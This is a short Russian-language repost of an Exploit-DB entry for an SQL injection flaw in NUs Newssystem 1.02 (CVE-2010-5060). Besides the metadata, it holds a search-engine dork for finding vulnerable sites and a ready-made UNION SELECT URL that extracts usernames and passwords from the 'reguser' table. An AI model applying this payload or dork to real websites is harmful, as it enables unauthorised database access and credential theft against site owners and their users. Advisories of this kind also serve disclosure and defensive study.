- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11674
- Проверка EDB
-
- Пройдено
- Автор
- N3W7U
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-5060
- Дата публикации
- 2010-03-09
Код:
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
~ NUs Newssystem 1.02 (id) SQL Injection Vulnerability ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
[+] Autor: n3w7u
[+] Page: http://www.internet-works.de/home.html
[+] Vulnerabilities [ SQL Injection ]
[+] Language: [ PHP ]
[+] Version: 1.02
[+] Dork : inurl:"?pageNum_RSnews"&view
.-=--=--=--=--=--=--=--=--=--=--=-.
[+] Vulnerability
Nus.php?pageNum_RSnews=0&id=
[+] Exploitable
http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--- Источник
- www.exploit-db.com
